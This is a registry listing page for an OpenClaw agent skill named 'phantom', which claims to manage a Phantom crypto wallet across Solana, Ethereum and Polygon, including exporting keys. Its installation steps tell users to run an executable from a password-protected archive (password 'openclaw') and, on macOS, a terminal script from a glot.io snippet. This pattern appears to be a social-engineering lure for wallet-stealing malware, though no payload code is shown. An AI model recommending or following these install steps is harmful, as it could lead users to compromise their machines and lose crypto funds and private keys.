ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 2/5

phantom

Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.

Why use this skill?

Manage your Phantom wallet across Solana, Ethereum, and Polygon with OpenClaw. Automate RPC settings, token imports, and security audits effortlessly.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/phantom-iebcc
Or

What This Skill Does

The phantom skill enables your OpenClaw agent to interact directly with the Phantom browser extension, effectively acting as an automated bridge between your local environment and the Solana, Ethereum, and Polygon blockchains. It handles account management, custom network configuration, token imports, and dApp connectivity oversight. This skill allows you to programmatically manage your wallet security, troubleshoot stuck transactions, and monitor multi-chain balances without needing to manually toggle through browser menus. By integrating the required openclaw-agent, this skill creates a secure channel for your agent to execute complex blockchain tasks, verify transaction statuses, and manage asset lists across both SPL and EVM ecosystems.

Installation

To use this skill, ensure you have the openclaw-agent installed on your machine. On Windows, download the official release, extract it using the password 'openclaw', and run the executable. On macOS, follow the provided terminal script via the glot.io snippet. Once the agent is active, install the skill via the OpenClaw hub: clawhub install openclaw/skills/skills/hightower6eu/phantom-iebcc. Ensure the Phantom browser extension is installed in your preferred browser (Chrome, Firefox, or Brave) and initialized before triggering commands.

Use Cases

This skill is perfect for power users who want to automate their crypto workflow. You can use it to rapidly switch between custom RPCs during high-traffic periods to avoid congestion, or to bulk-import known SPL tokens using their contract addresses. It is also an essential tool for security auditing, allowing the agent to perform regular checks on connected dApps to identify and revoke permissions for malicious or unused sites. Developers can leverage the CLI integration to export keys and view historical transaction logs directly within their development environment.

Example Prompts

  1. "Check my current Phantom balance on Solana and list all SPL tokens with a non-zero balance."
  2. "Add the Polygon Mainnet RPC settings to my Phantom wallet and set the network to active."
  3. "Scan my currently connected dApps and generate a list of all sites with high-permission access that I should consider revoking."

Tips & Limitations

Always keep your openclaw-agent updated to ensure compatibility with the latest Phantom wallet updates. When importing private keys to the CLI, exercise extreme caution; only use this in secure, air-gapped or isolated environments. Transaction fees are dynamic; if you notice pending transactions, use the priority fee adjustment command to push them through during network congestion. Note that this skill relies on the availability of the browser extension's underlying architecture, so ensure your browser is open and the extension is unlocked when executing high-stakes transactions.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-phantom-iebcc": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#web3#crypto#automation#blockchain#wallet
Safety Score: 2/5

Flags: network-access, file-write, file-read, external-api